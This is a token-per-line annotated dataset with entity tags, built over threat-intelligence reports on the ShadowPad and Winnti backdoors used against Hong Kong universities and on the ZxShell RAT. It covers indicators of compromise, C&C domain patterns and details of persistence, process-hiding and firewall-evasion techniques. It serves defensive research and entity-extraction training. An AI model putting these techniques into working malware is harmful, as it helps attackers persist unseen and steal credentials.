O + +This O +version O +embeds O +the O +17 O +modules O +listed O +in O +the O +following O +table O +: O + +100 O +Root O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:08:27 I-TIME +PM I-TIME +UTC E-TIME +Initial O +shellcode O +. O +101 O +Plugins O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:07:02 I-TIME +PM I-TIME +UTC E-TIME +Provides O +API O +for O +the O +other O +modules O +; O +loads O +modules O +. O +102 O +Config O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:07:09 I-TIME +PM I-TIME +UTC E-TIME +Handles B-FILE +encrypted I-FILE +configuration I-FILE +string I-FILE +pool E-FILE +. O +103 O +Install O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:07:46 I-TIME +PM I-TIME +UTC E-TIME +Achieves O +persistence O +. O +104 O +Online O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:07:17 I-TIME +PM I-TIME +UTC E-TIME +Overall O +communications O +with O +the O +C&C S-TOOL +server O +. O +106 O +ImpUser O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:07:24 I-TIME +PM I-TIME +UTC E-TIME +User O +impersonation O +via O +token O +duplication O +. O +200 O +TCP S-PROT +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:01:01 I-TIME +PM I-TIME +UTC E-TIME +TCP S-PROT +communications O +. O +202 O +HTTPS O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:01:15 I-TIME +PM I-TIME +UTC E-TIME +HTTPS S-PROT +communications O +. O +207 O +Pipe O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:01:35 I-TIME +PM I-TIME +UTC E-TIME +Handles O +named O +pipes O +. O +300 O +Disk O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:02:29 I-TIME +PM I-TIME +UTC E-TIME +File O +system O +operations O +. O +301 O +Process O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:02:36 I-TIME +PM I-TIME +UTC E-TIME +Process O +handling O +. O +302 O +Servcie O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:02:45 I-TIME +PM I-TIME +UTC E-TIME +Service O +handling O +. 
O +303 O +Register O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:02:52 I-TIME +PM I-TIME +UTC E-TIME +Registry O +operations O +. O +304 O +Shell O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:03:00 I-TIME +PM I-TIME +UTC E-TIME +Command O +line O +operations O +. O +306 O +Keylogger O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:03:16 I-TIME +PM I-TIME +UTC E-TIME +Keylogging O +to O +file O +system O +. O +307 O +Screen O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:03:25 I-TIME +PM I-TIME +UTC E-TIME +Screenshot O +capture O +. O +317 O +RecentFiles O +Thu B-TIME +24 I-TIME +Oct I-TIME +2019 I-TIME +12:04:44 I-TIME +PM I-TIME +UTC E-TIME +Lists O +recently O +accessed O +files O +. O + +These O +modules O +, O +except O +for O +RecentFiles O +, O +have O +already O +been O +mentioned O +by O +Kaspersky S-SECTEAM +and O +Avast S-SECTEAM +. O + +Notice O +the O +“ O +Servcie O +” O +typo O +. O + +As O +usual O +, O +all O +the O +module O +timestamps O +are O +spread O +over O +a O +short O +time O +range O +, O +which O +could O +suggest O +the O +use O +of O +a O +build O +framework O +to O +compile O +these O +modules O +. O + +This O +also O +suggests O +that O +these O +modules O +were O +built O +a O +few O +hours O +before O +the O +launcher O +itself O +, O +whose O +compilation O +timestamp O +is O +Thu B-TIME +Oct I-TIME +24 I-TIME +14:10:32 I-TIME +2019 E-TIME +. O + +Since O +this O +compilation O +timestamp O +dates O +back O +two O +weeks O +before O +this O +campaign O +, O +it O +’s O +likely O +that O +it O +has O +n’t O +been O +tampered O +with O +by O +the O +attackers O +. O + +One O +might O +also O +note O +that O +the O +number O +of O +modules O +embedded O +in O +this O +variant O +is O +much O +higher O +( O +17 O +) O +than O +the O +number O +of O +modules O +embedded O +in O +the O +variants O +previously O +documented O +in O +our O +white O +paper O +( O +8 O +to O +10 O +modules O +) O +. 
O + +By O +default O +, O +every O +keystroke O +is O +recorded O +using O +the O +Keylogger O +module O +( O +306, O +previously O +documented O +by O +Avast S-SECTEAM +) O +and O +saved O +to O +disk O +in O +the O +file O +%APPDATA%\PAGM\OEY\XWWEYG\WAOUE S-FILE +. O + +The O +log O +file O +is O +encrypted O +using O +the O +same O +algorithm O +as O +the O +one O +used O +to O +encrypt O +static O +strings O +from O +the O +module O +. O + +Using O +this O +module O +by O +default O +indicates O +that O +the O +attackers O +are O +interested O +in O +stealing O +information O +from O +the O +victims O +’ O +machines O +. O + +In O +contrast O +, O +the O +variants O +we O +described O +in O +our O +white O +paper O +did O +n’t O +even O +have O +that O +module O +embedded O +. O + +As O +with O +previous O +ShadowPad S-MAL +variants O +, O +the O +Config O +module O +( O +102 O +) O +contains O +an O +encrypted O +string O +pool O +that O +can O +be O +accessed O +from O +any O +other O +module O +. O + +The O +string O +pool O +is O +never O +stored O +entirely O +decrypted O +in O +memory O +; O +the O +field O +of O +interest O +is O +decrypted O +when O +needed O +and O +then O +immediately O +freed O +( O +thus O +quickly O +unavailable O +) O +. O + +The O +configuration O +size O +is O +2180 O +bytes O +and O +the O +encrypted O +strings O +are O +located O +at O +offset O +0x84 O +. O + +The O +algorithm O +used O +to O +decrypt O +the O +strings O +is O +the O +same O +as O +the O +one O +used O +to O +decrypt O +the O +static O +strings O +of O +the O +module O +. O + +The O +campaign O +ID O +is O +located O +at O +offset O +0x99 O +and O +is O +the O +name O +of O +the O +targeted O +university O +. O + +Having O +a O +campaign O +ID O +related O +to O +the O +target O +is O +quite O +common O +in O +the O +case O +of O +ShadowPad S-MAL +and O +Winnti S-MAL +. 
O + +Interestingly O +, O +the O +timestamp O +present O +in O +this O +config O +at O +offset O +0x84 O +is O +later O +than O +the O +modules O +’ O +timestamps O +and O +the O +loader O +compilation O +timestamp O +. O + +This O +suggests O +that O +this O +config O +is O +added O +manually O +to O +the O +sample O +after O +having O +been O +built O +. O + +Even O +though O +it O +’s O +probably O +coincidental O +, O +the O +date O +within O +the O +config O +corresponds O +to O +the O +date O +of O +the O +first O +detection O +of O +this O +sample O +at O +the O +corresponding O +university O +. O + +Once O +installed O +on O +the O +system O +, O +ShadowPad S-MAL +starts O +a O +hidden O +and O +suspended O +Microsoft B-TOOL +Windows I-TOOL +Media I-TOOL +Player E-TOOL +wmplayer.exe S-FILE +process O +and O +injects O +itself O +into O +that O +process O +. O + +The O +path O +to O +wmplayer.exe S-FILE +is O +provided O +by O +the O +Config O +module O +. O + +Once O +ShadowPad S-MAL +is O +injected O +into O +wmplayer.exe S-FILE +, O +the O +Online O +module O +will O +contact O +the O +C&C S-TOOL +server O +using O +the O +URL O +specified O +in O +the O +configuration O +. O + +The O +communication O +is O +then O +handled O +by O +the O +TCP S-PROT +module O +( O +200 O +) O +, O +which O +was O +previously O +documented O +by O +Kaspersky S-SECTEAM +. O + +In O +addition O +to O +ShadowPad S-MAL +, O +the O +Winnti S-MAL +malware O +was O +found O +on O +some O +machines O +at O +these O +two O +universities O +at O +the O +end B-TIME +of I-TIME +October E-TIME +( O +i.e O +. O +two O +weeks O +before O +ShadowPad S-MAL +) O +in O +the O +file O +C:\Windows\System32\oci.dll S-FILE +and O +is O +detected O +by O +ESET S-IDTY +products O +as O +Win64/Winnti.CA O +. O + +The O +Winnti S-MAL +malware O +usually O +contains O +a O +configuration O +specifying O +a O +campaign O +ID O +and O +a O +C&C S-TOOL +URL O +. 
O + +On O +all O +machines O +the O +campaign O +ID O +matches O +the O +name O +of O +the O +targeted O +university O +and O +the O +C&C S-TOOL +URLs O +are O +: O + +w[redacted].livehost.live S-URL +: O +443 O +. O +w[redacted].dnslookup.services S-URL +: O +443 O +. O +where O +the O +redacted O +part O +corresponds O +to O +the O +name O +of O +the O +targeted O +university O +. O + +One O +can O +observe O +that O +the O +C&C S-TOOL +URL O +used O +by O +both O +Winnti S-MAL +and O +ShadowPad S-MAL +complies O +to O +the O +scheme O +[backdoor_type][target_name].domain.tld O +: O +443 O +where O +[backdoor_type] O +is O +a O +single O +letter O +which O +is O +either O +“ O +w O +” O +in O +the O +case O +of O +the O +Winnti S-MAL +malware O +or O +“ O +b O +” O +in O +the O +case O +of O +ShadowPad S-MAL +. O + +From O +this O +format O +, O +we O +were O +able O +to O +find O +several O +C&C S-URL +URLs O +, O +including O +three O +additional O +Hong B-LOC +Kong E-LOC +universities O +’ O +names O +. O + +The O +campaign O +identifiers O +found O +in O +the O +samples O +we O +’ve O +analyzed O +match O +the O +subdomain O +part O +of O +the O +C&C S-TOOL +server O +, O +showing O +that O +these O +samples O +were O +really O +targeted O +against O +these O +universities O +. O + +The O +Winnti B-APT +Group E-APT +is O +still O +actively O +using O +one O +of O +its O +flagship O +backdoors S-MAL +, O +ShadowPad S-MAL +, O +this O +time O +against O +Hong B-LOC +Kong E-LOC +universities O +. O + +In O +this O +campaign O +, O +the O +VMProtected S-TOOL +launcher O +used O +with O +ShadowPad S-MAL +, O +as O +well O +as O +with O +the O +PortReuse B-MAL +backdoor E-MAL +and O +skip-2.0 S-MAL +, O +was O +replaced O +by O +a O +simpler O +one O +. 
O + +That O +these O +samples O +, O +in O +addition O +to O +having O +been O +found O +at O +these O +universities O +, O +contain O +campaign O +IDs O +matching O +the O +universities O +’ O +names O +and O +use O +C&C S-TOOL +URLs O +containing O +the O +universities O +��� O +names O +are O +good O +indications O +that O +this O +campaign O +is O +highly O +targeted O +. O + +We O +will O +continue O +to O +monitor O +new O +activities O +of O +the O +Winnti B-APT +Group E-APT +and O +will O +publish O +relevant O +information O +on O +our O +blog O +. O + +For O +any O +inquiries O +, O +contact O +us O +at O +threatintel@eset.com O +. O + +The O +IoCs O +are O +also O +available O +in O +our O +GitHub S-TOOL +repository O +. O + +ESET S-IDTY +detection O +names O +: O +Win32 S-OS +/ O +Shadowpad.C S-FILE +trojan S-MAL +Win64 S-OS +/ O +Winnti.CA S-FILE +trojan S-MAL +. O + +Winnti S-APT +: O +hpqhvsei.dll S-FILE +. O + +Winnti S-APT +: O +CLR.exe S-FILE +. O + +Winnti S-APT +: O +hpqhvsei.dll S-FILE +. O + +Winnti S-APT +: O +hpqhvind.exe S-FILE +. O + +Winnti S-APT +: O +hpqhvsei.dll S-FILE +. O + +Winnti S-APT +: O +oci.dll S-FILE +. O + +Winnti S-APT +: O +C&C S-TOOL +: O +b[org_name].dnslookup.services S-URL +: O +443 O +. O + +Winnti S-APT +: O +C&C S-TOOL +: O +w[org_name].livehost.live S-URL +: O +443 O +. O + +Winnti S-APT +: O +C&C S-TOOL +: O +w[org_name].dnslookup.services S-URL +: O +443 O +. O + + +Middle B-LOC +Eastern E-LOC +hacking O +group O +is O +using O +FinFisher S-MAL +malware O +to O +conduct O +international O +espionage O +. O + +Recently O +, O +there O +was O +a O +blog O +post O +on O +the O +takedown O +of O +a O +botnet S-MAL +used O +by O +threat O +actor O +group O +known O +as O +Group B-APT +72 E-APT +and O +their O +involvement O +in O +Operation B-ACT +SMN E-ACT +. 
O + +This O +group O +is O +sophisticated O +, O +well O +funded O +, O +and O +exclusively O +targets O +high O +profile O +organizations O +with O +high O +value O +intellectual O +property O +in O +the O +manufacturing O +, O +industrial O +, O +aerospace O +, O +defense O +, O +and O +media O +sector O +. O + +The O +primary O +attack O +vectors O +are O +watering-hole S-ACT +, O +spear B-ACT +phishing E-ACT +, O +and O +other O +web-based O +attacks O +. O + +Frequently O +, O +a O +remote B-TOOL +administration I-TOOL +tool E-TOOL +( O +RAT S-TOOL +) O +is O +used O +to O +maintain O +persistence O +within O +a O +victim O +’s O +organization O +. O + +These O +tools O +are O +used O +to O +further O +compromise O +the O +organization O +by O +attacking O +other O +hosts O +inside O +the O +targets O +network O +. O + +ZxShell S-MAL +( O +aka O +Sensocode S-MAL +) O +is O +a O +Remote B-TOOL +Administration I-TOOL +Tool E-TOOL +( O +RAT S-TOOL +) O +used O +by O +Group B-APT +72 E-APT +to O +conduct O +cyber-espionage O +operations O +. O + +Once O +the O +RAT S-TOOL +is O +installed O +on O +the O +host O +it O +will O +be O +used O +to O +administer O +the O +client O +, O +exfiltrate O +data O +, O +or O +leverage O +the O +client O +as O +a O +pivot O +to O +attack B-ACT +an I-ACT +organization I-ACT +’s I-ACT +internal I-ACT +infrastructure E-ACT +. O + +Here O +is O +a O +short O +list O +of O +the O +types O +of O +tools O +included O +with O +ZxShell S-MAL +: O + +Keylogger S-TOOL +( O +used O +to O +capture O +passwords O +and O +other O +interesting O +data O +) O +. O + +Command B-TOOL +line I-TOOL +shell E-TOOL +for O +remote O +administration O +. O + +Remote B-TOOL +desktop E-TOOL +. O + +Various B-TOOL +network I-TOOL +attack I-TOOL +tools E-TOOL +used O +to O +fingerprint O +and O +compromise O +other O +hosts O +on O +the O +network O +. O + +Local B-TOOL +user I-TOOL +account I-TOOL +creation I-TOOL +tools E-TOOL +. 
O + +For O +a O +complete O +list O +of O +tools O +please O +see O +the O +MainConnectionIo O +section O +. O + +The O +following O +paper O +is O +a O +technical O +analysis O +on O +the O +functionality O +of O +ZxShell S-MAL +. O + +The O +analysts O +involved O +were O +able O +to O +identify O +command B-TOOL +and I-TOOL +control E-TOOL +( O +C2 S-TOOL +) O +servers O +, O +dropper O +and O +installation O +methods O +, O +means O +of O +persistence O +, O +and O +identify O +the O +attack O +tools O +that O +are O +core O +to O +the O +RAT S-TOOL +’s O +purpose O +. O + +In O +addition O +, O +the O +researchers O +used O +their O +analysis O +to O +provide O +detection O +coverage O +for O +Snort S-TOOL +, O +Fireamp S-TOOL +, O +and O +ClamAV S-TOOL +. O + +ZxShell S-MAL +has O +been O +around O +since O +2004 S-TIME +. O + +There O +are O +a O +lot O +of O +versions O +available O +in O +the O +underground O +market O +. O + +We O +have O +analyzed O +the O +most O +common O +version O +of O +ZxShell S-MAL +, O +version O +3.10 O +. O + +There O +are O +newer O +versions O +, O +up O +to O +version O +3.39 O +as O +of O +October B-TIME +2014 E-TIME +. O + +An O +individual O +who O +goes O +by O +the O +name O +LZX O +in O +some O +online O +forums O +is O +believed O +to O +be O +the O +original O +author O +of O +ZxShell S-MAL +. O + +Since O +ZxShell S-MAL +has O +been O +around O +since O +at O +least B-TIME +2004 E-TIME +, O +numerous O +people O +have O +purchased O +or O +obtained O +the O +tools O +necessary O +to O +set O +up O +ZxShell S-MAL +command B-TOOL +and I-TOOL +control E-TOOL +servers O +( O +C&C S-TOOL +) O +and O +generate O +the O +malware O +that O +is O +placed O +on O +the O +victim O +’s O +network O +. 
O + +ZxShell S-MAL +has O +been O +observed O +to O +be O +distributed O +through O +phishing B-ACT +attacks E-ACT +, O +dropped O +by O +exploits O +that O +leverage O +vulnerabilities O +such O +as O +CVE-2011-2462 S-VULID +, O +CVE-2013-3163 S-VULID +, O +and O +CVE-2014-0322 S-VULID +. O + +To O +illustrate O +the O +functionality O +of O +main O +ZxShell S-MAL +module O +, O +Let O +’s O +take O +a O +look O +at O +the O +following O +sample O +: O + +MD5 S-ENCR +: O +e3878d541d17b156b7ca447eeb49d96a S-MD5 +. O + +SHA256 S-ENCR +: O +1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c S-SHA2 +. O + +It O +exports O +the O +following O +functions O +, O +which O +are O +examined O +in O +greater O +detail O +below O +: O +DllMain O +Install O +UnInstall O +ServiceMain O +ShellMain O +ShellMainThread O +zxFunction001 O +zxFunction002 O +. O + +DllMain O +performs O +the O +initialization O +of O +ZxShell S-MAL +. O + +It O +allocates O +a O +buffer O +of O +0x2800 O +bytes O +and O +copies O +the O +code O +for O +the O +ZxGetLibAndProcAddr O +function O +. O + +To O +copy O +memory O +, O +the O +memcpy O +function O +is O +invoked O +. O + +It O +is O +not O +directly O +used O +from O +msvcrt.dll S-FILE +but O +is O +instead O +copied O +to O +another O +memory O +chunk O +before O +being O +called O +. O + +Finally O +, O +the O +trojan S-MAL +Import B-TOOL +Address I-TOOL +Table E-TOOL +( O +IAT S-TOOL +) O +is O +resolved O +and O +the O +file O +path O +of O +the O +process O +that O +hosts O +the O +DLL S-TOOL +is O +resolved O +and O +saved O +in O +a O +global O +variable O +. O + +ZxShell.dll S-FILE +is O +injected O +in O +a O +shared O +SVCHOST S-TOOL +process O +. O + +The O +Svchost S-TOOL +group O +registry O +key O +HKLM\SOFTWARE\Microsoft\Windows S-OS +NT\CurrentVersion\SvcHost O +is O +opened O +and O +the O +netsvc S-TOOL +group O +value O +data O +is O +queried O +to O +generate O +a O +name O +for O +the O +service O +. 
O + +Before O +the O +malware O +can O +be O +installed O +a O +unique O +name O +must O +to O +be O +generated O +for O +the O +service O +. O + +The O +malware O +accomplishes O +this O +through O +querying O +the O +netsvc S-TOOL +group O +value O +data O +located O +in O +the O +svchost S-TOOL +group O +registry O +key O +which O +is O +HKLM\SOFTWARE\Microsoft\Windows S-OS +NT\CurrentVersion\SvcHost O +. O + +At O +startup O +, O +Svchost.exe S-FILE +checks O +the O +services O +part O +of O +the O +registry O +and O +constructs O +a O +list O +of O +services O +to O +load O +. O + +Each O +Svchost S-TOOL +session O +can O +contain O +multiple O +shared O +services O +that O +are O +organized O +in O +groups O +. O + +Therefore O +, O +separate O +services O +can O +run O +, O +depending O +on O +how O +and O +where O +Svchost.exe S-FILE +is O +started O +. O + +Svchost.exe S-FILE +groups O +are O +identified O +in O +the O +above O +registry O +key O +. O + +Each O +value O +under O +this O +key O +represents O +a O +separate O +Svchost S-TOOL +group O +and O +appears O +as O +a O +separate O +instance O +when O +you O +are O +viewing O +active O +processes O +. O + +Each O +value O +is O +a O +REG_MULTI_SZ O +value O +and O +contains O +the O +services O +that O +run O +under O +that O +Svchost S-TOOL +group O +. O + +Each O +Svchost S-TOOL +group O +can O +contain O +one O +or O +more O +service O +names O +that O +are O +extracted O +from O +the O +following O +registry O +key O +, O +whose O +Parameters O +key O +contains O +a O +ServiceDLL S-TOOL +value O +: O +HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service O +. O + +On O +a O +Windows S-OS +machine O +, O +the O +netsvc S-TOOL +group O +contains O +names O +of O +both O +existing O +and O +non-existing O +services O +. 
O + +ZxShell S-MAL +exploits O +this O +fact O +by O +cycling O +between O +each O +of O +the O +names O +, O +verifying O +the O +existence O +of O +the O +real O +service O +. O + +The O +service O +’s O +existence O +is O +verified O +with O +the O +ServiceExists O +function O +, O +which O +attempts O +to O +open O +the O +relative O +registry O +sub-key O +in O +HKLM\SYSTEM\CurrentControlSet\Services O +. O + +The O +first O +service O +name O +that O +is O +not O +installed O +on O +the O +system O +becomes O +the O +ZxShell S-MAL +service O +name O +. O + +A O +new O +service O +is O +then O +created O +using O +the O +service O +parser O +function O +ProcessScCommand O +. O + +ZxShell S-MAL +implemented O +its O +own O +version O +of O +the O +Windows B-TOOL S-OS I-TOOL +SC I-TOOL +command E-TOOL +. O + +There O +are O +minor O +differences O +between O +the O +ZxShell S-MAL +implementation O +of O +this O +command O +and O +the O +original O +Windows S-OS +one O +. O + +The O +installed O +service O +registry O +key O +is O +opened O +and O +the O +2 O +values O +under O +its O +Parameter O +subkey O +are O +created O +. O + +These O +2 O +values O +, O +ServiceDll S-TOOL +and O +ServiceDllUnloadOnStop S-TOOL +are O +needed O +for O +services O +that O +run O +in O +a O +shared O +process O +. O + +Before O +the O +service O +is O +started O +ChangeServiceConfig O +is O +called O +to O +modify O +the O +service O +type O +to O +shared O +and O +interactive O +. O + +If O +the O +service O +fails O +to O +start O +then O +a O +random O +service O +name O +formatted O +as O +netsvc_xxxxxxxx O +, O +where O +xxxxxxxx O +represent O +an O +8-digit O +random O +hex O +value O +, O +is O +added O +to O +the O +netsvc S-TOOL +group O +and O +the O +entire O +function O +is O +repeated O +. O + +This O +function O +is O +the O +entry O +point O +of O +the O +service O +. 
O + +It O +registers O +the O +service O +using O +the O +RegisterServiceCtrlHandler O +Windows S-OS +API O +function O +. O + +The O +ZxShell S-MAL +service O +handler O +routine O +is O +only O +a O +stub O +: O +it O +responds O +to O +each O +service O +request O +code O +, O +doing O +nothing O +, O +and O +finally O +exits O +. O + +It O +sets O +the O +service O +status O +to O +RUNNING O +and O +finally O +calls O +the O +ShellMain O +function O +of O +ZxShell S-MAL +. O + +The O +ShellMain O +function O +is O +a O +stub O +that O +relocates O +the O +DLL S-TOOL +to O +another O +buffer O +and O +spawns O +a O +thread O +that O +starts O +from O +ShellMainThreadInt O +at O +offset O ++0xC0CD O +. O + +The O +ShellMainThreadInt O +function O +gets O +the O +HeapDestroy O +Windows S-OS +API O +address O +and O +replaces O +the O +first O +3 O +bytes O +with O +the O +RET O +4 O +opcode O +. O + +Subsequently O +, O +it O +calls O +the O +FreeLibrary O +function O +to O +free O +its O +own O +DLL S-TOOL +buffer O +located O +at O +its O +original O +address O +. O + +Because O +of O +this O +, O +the O +allocated O +heaps O +will O +not O +be O +freed O +. O + +It O +re-copies O +the O +DLL S-TOOL +from O +the O +new O +buffer O +to O +the O +original O +one O +using O +the O +memcpy O +function O +. O + +Finally O +, O +it O +spawns O +the O +main O +thread O +that O +starts O +at O +the O +original O +location O +of O +ShellMainThread O +procedure O +, O +and O +terminates O +. O + +At O +this O +point O +, O +the O +ZxShell S-MAL +library O +is O +no O +longer O +linked O +in O +the O +module O +list O +of O +the O +host O +process O +. O + +This O +is O +important O +because O +if O +any O +system O +tool O +tries O +to O +open O +the O +host O +process O +it O +will O +never O +display O +the O +ZxShell S-MAL +DLL S-TOOL +. O + +This O +thread O +implements O +the O +main O +code O +, O +responsible O +for O +the O +entire O +botnet S-MAL +DLL S-TOOL +. 
O + +First O +, O +it O +checks O +if O +the O +DLL S-TOOL +is O +executed O +as O +a O +service O +. O + +If O +so O +, O +it O +spawns O +the O +service O +watchdog S-TOOL +thread O +. O + +The O +watchdog S-TOOL +thread O +checks O +the O +registry O +path O +of O +the O +ZxShell S-MAL +service O +every O +2 O +seconds O +, O +to O +verify O +that O +it O +has O +n’t O +been O +modified O +. O + +If O +a O +user O +or O +an O +application O +modifies O +the O +ZxShell S-MAL +service O +registry O +key O +, O +the O +code O +restores O +the O +original O +infected O +service O +key O +and O +values O +. O + +The O +buffer O +containing O +the O +ZxShell S-MAL +Dll S-TOOL +in O +the O +new O +location O +is O +freed O +using O +the O +VirtualFree O +API O +function O +. O + +A O +handle O +to O +the O +DLL S-TOOL +file O +is O +taken O +in O +order O +to O +make O +its O +deletion O +more O +difficult O +. O + +The O +ZxShell S-TOOL +mutex O +is O +created O +named O +@_ZXSHELL_@ O +. O + +ZxShell S-MAL +plugins O +are O +parsed O +and O +loaded O +with O +the O +AnalyseAndLoadPlugins O +function O +. O + +The O +plugin O +registry O +key O +HKLM\SYSTEM\CurrentControlSet\Control\zxplug O +is O +opened O +and O +each O +value O +is O +queried O +. O + +The O +registry O +value O +contains O +the O +plugin O +file O +name O +. O + +The O +target O +file O +is O +loaded O +using O +the O +LoadLibrary O +API O +function O +, O +and O +the O +address O +of O +the O +exported O +function O +zxMain O +is O +obtained O +with O +GetProcAddress O +. O + +If O +the O +target O +filename O +is O +incorrect O +or O +invalid O +the O +plugin O +file O +is O +deleted O +and O +the O +registry O +value O +is O +erased O +. O + +That O +is O +performed O +by O +the O +function O +DeleteAndLogPlugin O +. O + +Otherwise O +, O +the O +plugin O +is O +added O +to O +an O +internal O +list O +. 
O + +The O +thread O +KeyloggerThread S-APT +is O +spawned O +and O +is O +responsible O +for O +doing O +keylogging O +on O +the O +target O +workstation O +. O + +We O +will O +take O +a O +look O +at O +the O +keylogger S-TOOL +later O +on O +. O + +Finally O +the O +main O +network O +communication O +function O +GetIpListAndConnect O +is O +called O +. O + +This O +function O +is O +at O +the O +core O +of O +the O +RAT S-TOOL +’s O +network O +communication O +. O + +It O +starts O +by O +initializing O +a O +random O +number O +generator O +and O +reading O +100 O +bytes O +inside O +the O +ZxShell S-MAL +Dll S-TOOL +at O +a O +hardcoded O +location O +. O + +These O +bytes O +are O +XOR S-ENCR +encrypted O +with O +the O +byte-key O +0x85 O +and O +contains O +a O +list O +of O +remote O +hosts O +where O +to O +connect O +. O + +The O +data O +is O +decrypted O +, O +the O +remote O +host O +list O +is O +parsed O +and O +verified O +using O +the O +BuildTargetIpListStruct O +function O +. O + +There O +are O +3 O +types O +of O +lists O +recognized O +by O +ZxShell S-MAL +: O +plain O +ip O +addresses O +, O +HTTP S-PROT +and O +FTP S-PROT +addresses O +. O + +If O +the O +list O +does O +not O +contain O +any O +item O +, O +or O +if O +the O +verification O +has O +failed O +, O +the O +ZxShell S-MAL +sample O +tries O +to O +connect O +to O +a O +hardcoded O +host O + +with O +the O +goal O +of O +retrieving O +a O +new O +updated O +list O +. O + +Otherwise O +, O +ZxShell S-MAL +tries O +to O +connect O +to O +the O +first O +item O +of O +the O +list O +. O + +If O +ZxShell S-MAL +successfully O +connects O +to O +the O +remote O +host O +, O +the O +function O +DoHandshake O +is O +called O +. O + +This O +function O +implements O +the O +initial O +handshake O +which O +consists O +of O +exchanging O +16 O +bytes O +, O +0x00001985 O +and O +0x00000425, O + +with O +the O +server O +. 
O + +The O +function O +GetLocalPcDescrStr O +is O +used O +to O +compose O +a O +large O +string O +that O +contains O +system O +information O +of O +the O +target O +workstation O +. O + +The O +string O +is O +sent O +to O +the O +remote O +host O +and O +the O +response O +is O +checked O +to O +see O +if O +the O +first O +byte O +of O +the O +response O +is O +0xF4, O +an O +arbitrary O +byte O +. O + +If O +it O +is O +, O +the O +botnet S-MAL +connection O +I/O O +procedure O +is O +called O +through O +the O +MainConnectionIo O +function O +. O + +Otherwise O +, O +the O +ZxShell S-MAL +code O +closes O +the O +socket O +used O +and O +sleeps O +for O +30 O +seconds O +. O + +It O +will O +then O +retry O +the O +connection O +with O +the O +next O +remote O +host O +, O +if O +there O +is O +one O +. O + +It O +is O +noteworthy O +that O +this O +function O +includes O +the O +code O +to O +set O +the O +ZxShell S-MAL +node O +as O +a O +server O +: O +if O +one O +of O +the O +hardcoded O +boolean O +value O +is O +set O +to O +1, O +a O +listening O +socket O +is O +created O +. O + +The O +code O +waits O +for O +an O +incoming O +connection O +. O + +When O +the O +connection O +is O +established O +a O +new O +thread O +is O +spawned O +that O +starts O +with O +the O +MainConnectionIo O +function O +. O + +The O +MainConnectionIo O +function O +checks O +if O +the O +Windows S-OS +Firewall S-TOOL +is O +enabled O +, O +sets O +the O +Tcp B-TOOL +Keep I-TOOL +Alive E-TOOL +value O +and O +Non-blocking O +mode O +connection O +options O +and O +receives O +data O +from O +the O +remote O +host O +through O +the O +ReceiveCommandData O +function O +. O + +Then O +the O +connection O +is O +retried O +. O + +The O +received O +command O +is O +then O +processed O +by O +the O +ZxShell S-MAL +function O +with O +the O +ProcessCommand O +function O +. 
O + +The O +command O +processing O +function O +starts O +by O +substituting O +the O +main O +module O +name O +and O +path O +in O +the O +hosting O +process O +PEB O +, O +with O +the O +one O +of O +the O +default O +internet O +browser O +. O + +This O +trick O +renders O +identification O +by O +firewall S-TOOL +more O +cumbersome O +. O + +A O +host O +firewall O + + S-TOOLwill O +recognize O +the O +outgoing O +connection O +as O +originated O +by O +the O +browser O +instead O +of O +the O +ZxShell S-MAL +service O +host O +process O +. O + +The O +browser O +process O +always O +performs O +outgoing O +connections O +and O +the O +firewall S-TOOL +should O +n’t O +block O +them O +. O + +The O +command O +processing O +is O +straightforward O +. O + +Here O +is O +the O +list O +of O +common O +commands O +: O + +Help O +/ O +? O +Get O +help O +. O + +Exit O +/ O +Quit O +Exit O +and O +shut O +down O +the O +botnet O +client O +. O + +SysInfo O +Get O +target O +System O +information O +. O + +SYNFlood O +Perform O +a O +SYN O +attack O +on O +a O +host O +. O + +Ps O +Process O +service O +Unix S-OS +command O +implementation O +. O + +CleanEvent O +Clear O +System O +Event O +log O +. O + +FindPass O +Find O +login O +account O +password O +. O + +FileTime O +Get O +time O +information O +about O +a O +file O +. O + +FindDialPass O +List O +all O +the O +dial-up O +accounts O +and O +passwords O +. O + +User O +Account O +Management O +System O +. O + +TransFile O +Transfer O +file O +in O +or O +from O +remote O +host O +. O + +Execute O +Run O +a O +program O +in O +the O +remote O +host O +. O + +SC O +Service O +control O +command O +, O +implemented O +as O +the O +Windows S-OS +one O +. O + +CA O +Clone O +user O +account O +. O + +RunAs O +Create O +new O +process O +as O +another O +User O +or O +Process O +context O +. O + +TermSvc O +Terminal O +service O +configuration O +( O +working O +on O +Win B-OS +Xp/2003 E-OS +) O +. 
